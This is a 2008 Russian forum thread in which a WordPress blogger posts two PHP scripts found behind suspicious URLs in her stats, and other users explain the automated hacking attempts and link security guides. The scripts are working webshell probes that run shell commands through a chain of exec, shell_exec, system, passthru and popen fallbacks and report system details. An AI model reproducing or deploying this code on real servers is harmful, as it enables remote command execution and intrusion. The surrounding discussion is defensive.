Master-X
Форум | Новости | Статьи
Главная » Форум » Блоги и Социальные сети » 
Тема: Ломают блог?
цитата
21/04/08 в 10:16
 berry
в статисики блога странные урлы..

http://seo-storage.info/st.jpg
в этих текстовых файликах лежит такое:

Код:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;


и такое:

Код:

<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}


не разбираюсь в php ((
такое ощущение что пытаются сломать блог.. или я параною?[/img]
цитата
21/04/08 в 10:30
 alt
угу, ломают, но это обычно на автомате все делается.
так что следи за апдейтами и патчами от разработчика =)
цитата
21/04/08 в 11:43
 berry
начиталась про проблемы апдейта WP.. так нехочется..но прийдется видимо..
а что конкретно делают?
цитата
21/04/08 в 12:07
 alt
доступ к панели управления пытаются получить вестимо

http://www.yugatech.com/blog/the-internet/hack-attack-in-progress/
цитата
21/04/08 в 12:12
 Kosmos
да пытаются вытянуть базу юзеров используюя sql иньекцию, и тем самым получить доступ к админке
цитата
21/04/08 в 14:19
 HwoR
Вообще лучше .htaccess'ом сразу при установке закрывать страницу логина и проблем заметно убавится.
цитата
21/04/08 в 15:28
 Христофор Бонефатьевич
Про безопастность wordpress читаем здесь - http://streha.ru/2007/09/19/zashhiti-sebya.html
цитата
21/04/08 в 15:48
 berry
уу.. как всё.. спасибо, побежала устранять уязвимости
вот кстати линка про XSS уязвимость(очень распространеная услуга оказывается - прогон по XSS базам)
http://maxsite.org/anti-xss-attack
если у кого-то еще есть мысли и методы защиты - выкладывайте!!
цитата
21/04/08 в 18:08
 Христофор Бонефатьевич
Еще несколько ссылок:
Список дырявых плагинов WordPress
http://habrahabr.ru/blog/wordpress/36973.html

Как узнать что меня взломали?
http://blogproseo.ru/kak-obezopasit-blog-rabotayushhij-na-wordpresse-ot-vzloma/

WordPress 2.5 - Уязвимость “Секретного ключа”
http://www.cybercore.ru/wp-25-secret-key-vulnerability/


Эта страница в полной версии